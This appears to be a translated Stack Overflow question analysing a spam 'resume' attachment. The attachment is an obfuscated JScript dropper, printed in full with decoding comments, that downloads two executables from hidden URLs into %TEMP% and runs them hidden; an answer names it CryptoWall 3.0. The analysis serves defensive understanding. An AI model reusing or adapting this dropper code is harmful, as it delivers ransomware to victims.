javascript - 这个恶意脚本试图完成什么?

标签 javascript activex malware wsh

抱歉,如果这不适合问这个问题,请 LMK 如果这个问题在其他地方更合适!

我的工作邮箱收到了一封特别有趣的垃圾邮件。说是某人的简历,其实是一段很晦涩的javascript。看起来它试图通过 activeX 启动 Windows 可执行文件。我认为攻击者的目标是让你直接将 .js 文件作为 Windows 脚本运行。我在我的 Windows 7 计算机上运行它,Symantec Endpoint 以“可疑的可执行图像下载”警告停止了它。我在未安装任何防病毒软件的 Windows XP 虚拟机中运行它,并收到弹出通知

2865241.exe - Appication Error The application failed to initialize properly (0xc0000135). Click on OK to terminate the application

随后是来自 Windows Script Host 的通知

Script: C:\path\to\Resume Jaime Harding.js
Line: 9
Char: 1
Error: Write to file failed.
Code: 800A0BBC
Source: ADODB.Stream

那么它实际上是在尝试写入一个二进制文件并运行它吗?它可能试图完成什么?为什么会失败? 我扮演了“容易上当受骗的电子邮件收件人”的角色并运行了它,结果它直接出错崩溃了。这可能在什么环境下成功?

很多乱码看起来像是故意取得很难看的变量名,被当作 window 的属性使用。但是,里面有很多 "charAt",所以那些字符串可能只是诱饵,脚本只是从中提取某些字符并使用它们。几个“函数”的参数以 (/regex/g,"") 的形式传递,所以它看起来像是在试图过滤掉字符串中的垃圾字符,但我看不出实际执行替换的 replace 调用在哪里。

下面是JS,它被高度混淆了。我为了它的可读性而对其进行了美化。

// Obfuscated Windows Script Host dropper (the WSH dialog quoted in the question
// shows it being executed as a .js file). Reading aid for the obfuscation:
//  * Real strings are buried in junk text and recovered with
//    String.prototype.replace(/[junk chars]/g, ""). The call is either made by
//    name (["replace"]) or through a method name computed as
//    (bigNumber)["toString"](radix); for the first such expression below
//    (line with qEI) the value decodes to "replace" in base 29, and the rest
//    follow the same shape.
//  * Method names on the COM objects are assembled from fragments joined by
//    ternaries whose numeric comparisons are all constant-true, so the first
//    branch is always taken.
//  * The many arithmetic expressions and decoded strings assigned to throwaway
//    locals and implicit globals (kOY, Tkv, LIm, ...) are never read: noise.
// Net behaviour, as derived from the decoded strings below: fetch a URL with
// MSXML2.XMLHTTP, write the response body with ADODB.Stream to
// %TEMP%\<numeric name>.exe, and launch it with WScript.Shell.Run using a
// hidden window. Detection hooks for defenders: the script host instantiating
// those three ProgIDs, a binary file created in %TEMP%, and a child process
// spawned by the script host.
(function () {
    // Noise block: dead arithmetic and dead string filters, nothing reads these.
    var D2p = (8.0 + "'=+)D]R.MPjS"["length"] * 28);
    kOY = ("\x89\x60eYE;U\x83L^SP'yp"["charCodeAt"](6) * 0 + 18.0);
    qEI = "N9-0GO3m8/d*VI4&g)tG*k"[("=[TOcgnm7St5a(hUdK,?"["charCodeAt"](13) * 409139717 + 39.0)["toString"](("xA\x85Ru6-iU{*c~\x87\x86("["charCodeAt"](5) * 0 + 29.0))](/[m\-\*I0tNO\)\&\/]/g, "");
    T7Y = "6Y=0oSknwWp[U&qjKCBF*L"[("<e.y\x8bZ2fX\x7f"["charCodeAt"](2) * 921305672 + 22.0)["toString"]((34.0 + "NuU\x7f/\x8a\x8683y$EY<f&{x"["charCodeAt"](8) * 0))](/[\*Kj\&\=6wW\[oBk]/g, "");
    var Ecf = (88 * "\x85P<S\x82"["length"] + 0.0);
    Tkv = ("T_e8\x83\x87X|fA\x80I\x89{\x85"["length"] * 2 + 3.0);
    var Cq7 = "AGREkUTp8D&bJGdZ;qL0QsP"[(9.0 + "u\x800]\x89@ye\x88\x8aWajvT="["charCodeAt"](10) * 280311852)["toString"]((3.0 + "<$*,?Rn"["length"] * 4))](/[RJ\&pLQkUd8As\;]/g, "");
    var ZTl = "`S75d`QHS@garJi50+94Y0"["replace"](/[Y\@\+HJ79a5\`]/g, "");
    LIm = "AGt9>wrW66389bs4a0Yv72"["replace"](/[rAs8a\>Ybt67]/g, "");
    gF9 = "#ni`1z0c~_w-vamT4uC7Fc%G"[(12.0 + "\x83%Q\x880\x8b*asr\x82;W"["length"] * 3877454369)["toString"]((5 * "_YKyr\x82"["length"] + 5.0))](/[\-\%4Fm\#0C\~1\_\`vn]/g, "");
    var Uwg = "QwFnSfAc07q2MpO!]P*HzbZ"[(4.0 + "CHE'zl+]e4"["length"] * 4238006093)["toString"]((34.0 + "1y.\x89d/}n*6\x7f\x88w"["charCodeAt"](8) * 0))](/[z\!f27\*Qw\]npcb]/g, "");
    // Download-and-execute routine.
    //   fr  - URL to fetch (passed in already obfuscated-then-decoded by the caller).
    //   KPA - file name for the downloaded body; rewritten below to a full path.
    //   rn  - when > 0 the saved file is executed after the download.
    // Errors inside the try block are swallowed, so the script exits quietly when
    // the download or the COM objects are unavailable.
    function Kg3(fr, KPA, rn) {
        // "]W_SFc)rHi7p_tz.TSv%hB_eKl5l" minus the junk characters is "WScript.Shell".
        var ERG = new ActiveXObject("]W_SFc)rHi7p_tz.TSv%hB_eKl5l"["replace"](/[\)KT\%vzF\_7\]5HB]/g, ""));
        var mE6 = ("Ov\x81xP*sX\x80"["length"] * 11 + 4.0);
        // ERG.ExpandEnvironmentStrings("%TEMP%") + "\" (char 92) + <file name>.
        // The "var KPA" re-declaration of the parameter is a no-op declaration; the
        // right-hand side still reads the caller-supplied file name.
        var KPA = ERG["Ex" + (73 > 45 ? "\x70" : "\x68") + "andEnvironmentSt" + "" + (77 > 7 ? "\x72" : "\x6d") + "ings"]("G%oT&EySM&PXX%"[("iIopR\x809O2\x82PtYg:'[}#"["charCodeAt"](12) * 225213779 + 43.0)["toString"]((0.0 + "OJN.R%\x8angI"["length"] * 3))](/[\&SXGyo]/g, "")) + String["f" + "romCharCod" + (81 > 5 ? "\x65" : "\x5e") + ""](92) + KPA;
        var j$2 = "qv3zu6Sa7FdMeSbxt~*fklyGQu"[(43.0 + "5Hd|tb/M3Yx\x87e"["charCodeAt"](6) * 1269417725)["toString"]((0 * "Wv1jN\x88G\x81muC4nVx#w<"["charCodeAt"](11) + 36.0))](/[G\*6qvl\~kxSQFMz7]/g, "");
        // Decodes to "MSXML2.XMLHTTP": the HTTP client used for the download.
        var Ttc = new ActiveXObject("kM+SGNXfMFfLD2g.kX[mM#L3H`qTFT/AP"["replace"](/[\/NkqF\[\#\+G\`gADmf3]/g, ""));
        QBc = "efbNd<t&A&q@4%`8RFLI29CH"["replace"](/[\`9\<edI\@R\&\%CLb]/g, "");
        // Ttc.onreadystatechange: writes the response body to disk once the
        // request completes. Because the request below is opened synchronously,
        // this fires during Ttc.send(), i.e. before the Run call further down.
        Ttc["onre" + (78 > 3 ? "\x61" : "\x5a") + "dys" + "t" + (71 > 45 ? "\x61" : "\x5c") + "techange"] = function () {
            // Ttc.readyState === 4: response fully received.
            if (Ttc["r" + "eadyStat" + (98 > 18 ? "\x65" : "\x60") + ""] === 4) {
                // Decodes to "ADODB.Stream" (the source named in the question's error dialog).
                var OF$ = new ActiveXObject("-AlDROqDWBJ.ESz!tbir#eH[a&lm"["replace"](/[H\#JWi\-E\!\[zqR\&lb]/g, ""));
                var Jwu = ("08#\x89:{\x83\x81[UR]2I"["charCodeAt"](10) * 4 + 60.0);
                // OF$.open()
                OF$["o" + "" + (58 > 34 ? "\x70" : "\x67") + "en"]();
                i61 = "eJj7XqxlFeC5B_1RsHQt!1"["replace"](/[QXje\!5sx\_Rl]/g, "");
                izb = ("U}o=Q8(c<\x8bO-|.5^"["charCodeAt"](6) * 2 + 34.0);
                var zyH = (10.0 + "\x80LF:,n'1-c0\x8a="["length"] * 11);
                var k3C = ";n@E2LaW=0GNTs-1JT!OTce"["replace"](/[T\=\;1\-\!ca\@G2]/g, "");
                // OF$.type = 1 (adTypeBinary), so the stream holds raw bytes.
                OF$["" + "t" + (91 > 18 ? "\x79" : "\x72") + "pe"] = 1;
                var EKM = "Ncvs&1RzLd8Qt7Z-~M(YQfrp"[("-*\x84f\x86N\x8b6Tn{qgw3yl\x7fK"["charCodeAt"](5) * 454460829 + 5.0)["toString"](("\x89/(,TD#e<kyn%+.xW"["charCodeAt"](13) * 0 + 33.0))](/[c7\(R\-s\~\&r8NQL]/g, "");
                // OF$.write(Ttc.ResponseBody)
                OF$["wri" + (76 > 16 ? "\x74" : "\x6a") + "" + "e"](Ttc["R" + (94 > 34 ? "\x65" : "\x5b") + "s" + "ponseB" + (85 > 2 ? "\x6f" : "\x65") + "dy"]);
                PDX = (31.0 + "5IY9?r\x896B{i1*Re"["charCodeAt"](12) * 6);
                // OF$.position = 0
                OF$["" + "posi" + (77 > 29 ? "\x74" : "\x6a") + "ion"] = 0;
                v$8 = (2.0 + "b&|\x8b)gY\x83"["length"] * 61);
                // OF$.saveToFile(KPA, 2): 2 = adSaveCreateOverWrite. This is the call
                // that raised "Write to file failed" in the question's WSH dialog.
                OF$["saveT" + (79 > 38 ? "\x6f" : "\x68") + "F" + "" + (85 > 43 ? "\x69" : "\x62") + "le"](KPA, 2);
                W2Q = "(DLsxL6Ll0a(OC]trZBv`b"[(")=\x88\x81>"["length"] * 10081381361 + 4.0)["toString"]((0 * "aWi\x80/4h\x60uIcJbt-^,'"["charCodeAt"](17) + 35.0))](/[\(OBx0r\`\]L]/g, "");
                // OF$.close()
                OF$["c" + "los" + (94 > 26 ? "\x65" : "\x5b") + ""]();
                var ue0 = "MT3gL29u`i-u4k3eR8N+o"["replace"](/[4\+\`L8MR93\-]/g, "");
            }
            ;
            var xbw = "MY<m6do1bcJs;j3mCP7c"[(283571292 * "GbS4sw#qE*\x7f)\x87V"["charCodeAt"](13) + 21.0)["toString"]((3 * "57e2>-m+"["length"] + 7.0))](/[\<3MoJ67b\;C]/g, "");
        };
        var b$y = ("\x86mjoi\x87n.(y0#,Y"["length"] * 2 + 0.0);
        Teq = "80u3mip>VfE-Mnlk9@[L*yEc"[("v({w>Y<qr#3-="["length"] * 3877454369 + 12.0)["toString"](("pm\x60oO(EeT<w"["charCodeAt"](5) * 0 + 35.0))](/[\[V0\*kEi3\@\>\-8n]/g, "");
        try {
            // Ttc.open("GET", fr, false): ";GoE%T" minus junk is "GET"; false = synchronous.
            Ttc["o" + "p" + (65 > 36 ? "\x65" : "\x5e") + "n"](";GoE%T"["replace"](/[o\%\;]/g, ""), fr, false);
            lw7 = "fte5jz9s_Yt=DIb]aB!6IB"[(1050143891 * "5~K<\x60c0>lC@=E("["charCodeAt"](6) + 41.0)["toString"]((0 * "p4uV?rw.'\x83m|\x86"["charCodeAt"](4) + 35.0))](/[\!\_9\=faIeY\]j]/g, "");
            var jLj = "`=e;E_fhW2c/F8njVljt(G"["replace"](/[\`\/\;lj2\(h\_\=8]/g, "");
            // Ttc.send(): blocks until the response arrives and the handler above has run.
            Ttc["" + "s" + (53 > 26 ? "\x65" : "\x5c") + "nd"]();
            var X2P = (41 * "&S_R8gA'v"["length"] + 7.0);
            if (rn > 0) {
                // ERG.Run(KPA, 0, 0): window style 0 = hidden, no wait for exit.
                // The "2865241.exe - Application Error" dialog in the question is
                // consistent with this launch having happened.
                ERG["R" + "" + (55 > 18 ? "\x75" : "\x6e") + "n"](KPA, 0, 0);
                pcx = "oHzfN0Bajv]M5Tpy(Ssik=Kt"[(9.0 + "=h)$[\x84>:8#MIZ-fK}"["charCodeAt"](7) * 869084600)["toString"]((35.0 + "Ul\x88\x84^ObN+:Q>HomiJqg"["charCodeAt"](9) * 0))](/[\=5jKapiS\(zo\]N0]/g, "");
            }
            ;
            var FmH = "7_3QTXRgjK6+mj/4!2&h[ml"[("djG\x80\x8bMk\x814&geJ/\x86#\x83s"["charCodeAt"](5) * 382957200 + 62.0)["toString"]((32.0 + "\x84h4qDZ2j$\x817C"["charCodeAt"](2) * 0))](/[Q\/gK\+7X\_\&\[m\!]/g, "");
            sIy = (36.0 + "O8^\x88aSZN&Ts"["charCodeAt"](9) * 4);
            VBS = (17 * "$jG)r^o\x894Oc5"["length"] + 1.0);
        } catch (er) {
            // Deliberately empty: any failure (no network, blocked COM object) is
            // silently ignored. NOTE(review): whether an error thrown inside the
            // onreadystatechange callback during the synchronous send() reaches this
            // catch is not shown here; the question's WSH dialog suggests it did not.
        }
        ;
        sKc = "l2iC]fvA]f8b7aTzyIkY9[vq"["replace"](/[72I8\[vyTCYl\]]/g, "");
    }
    // First download: (URL after junk filtering, "2865241.exe", run = 1).
    // The file name matches the crashing process named in the question.
    Kg3("qhAtyt<zpx5:X/>/DdMa@vciksl1x>.=Ir7uK/Ri0m2a`gIe-%s0/6Ooqn]e)!.7]jNpKg"["replace"](/[qyKADO\%\-67\)\>R\`I5\@z\<0N2\=\!klxM\]cX]/g, ""), "L2MP8&6@5s2s4Q1().ibeaxYe"[(672699379 * "\x81\x7f{=%\x85+tE~?DP"["charCodeAt"](10) + 57.0)["toString"]((6.0 + "A\x86hk8DU\x82G6390."["length"] * 2))](/[ab\&Yi\)\@s\(PQLM]/g, ""), 1);
    iBR = "~UcONvQg!zT2P(RXe-k(Pp"[(3977508874 * "{2\x7f\x82A\x83S\x88\x84gW~c%P"["length"] + 8.0)["toString"]((0 * "Gk5o~$\x89;2^:plS&gUhnR"["charCodeAt"](10) + 36.0))](/[NQTP\(\-Xc\~\!]/g, "");
    var TAb = (2.0 + "B%;'(W]0JaEi\x898_"["length"] * 1);
    Jfj = "Qk*rH@UKlsg5O->f`4~iyz"[(2032260927 * ",2\x84\x8b\x60P_[;Qtg"["length"] + 9.0)["toString"]((1.0 + "pQdk["["length"] * 6))](/[\-\~\`sK\@Qy\>\*5r]/g, "");
    dkD = "`aL1;xbr;eJkDA)R*hoM"[(62.0 + ";[DY7J:K\x85\x88x$3t<"["charCodeAt"](7) * 393169392)["toString"]((0 * ";fud=6t(%\x80\x82+y^m"["charCodeAt"](8) + 32.0))](/[L\)o\`J\*bD\;]/g, "");
    Hz9 = "zNiGSF9+7WHUhpZxILHEM"["replace"](/[F\+pULEzSixW]/g, "");
    // Second download: a different URL and another numeric .exe name, run = 1.
    // Two sequential calls explain why the question saw both an application
    // error for the first executable and a later ADODB.Stream write failure.
    Kg3("Bhxt(tZ%pfM:#/Y/%nd3a;vGxiNs8R1N.kr>uTD/ficmTaKg5e&s4J/]tEwWoJ.EjH%pcg"[(7089588933 * "z_OC("["length"] + 2.0)["toString"]((33.0 + "PRybeAL>6;U\x87"["charCodeAt"](9) * 0))](/[4DKJ5RY\(3NM\%cx\]Hn\>ET\&WfkG\#\;8ZB]/g, ""), "S1-2+40605X4[9=.pelx;e"[(68.0 + "T|YL[u;<UR\x83x?\x80D~\x8b2b"["charCodeAt"](8) * 701913330)["toString"](("\x8a)jUF4$^e\x7fy;{WL_d]Xg"["charCodeAt"](6) * 1 + 0.0))](/[lX\-S\;\=\[p0\+]/g, ""), 1);
    // Trailing noise.
    sZV = (1 * "p\x83jcq\x88d6\x85g[Ca&"["charCodeAt"](7) + 24.0);
    var q3y = "+mp&uoRvn/GXa`rJKxKzW"[(33.0 + "|P,Ehf7\x8a\x82QN0X"["charCodeAt"](6) * 1084775147)["toString"]((6.0 + "^d\x896m2?:\x83\x8b"["length"] * 3))](/[\`mxoXz\/vJ\+\&]/g, "");
    var vQ8 = "TAM~6=&uHrQcF=p3sOqS~81C"[(308784692 * "\x60,'3OKskndZw\x8b5iRgGN"["charCodeAt"](13) + 43.0)["toString"](("+O6hr>Vn8_0zktN"["length"] * 1 + 14.0))](/[TQ\&3\~OqM\=H1c]/g, "")
})();//p061q4Iu1W

最佳答案

此恶意软件称为 CryptoWall 3.0。参见 this article获取更多信息。

关于javascript - 这个恶意脚本试图完成什么?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/29223127/
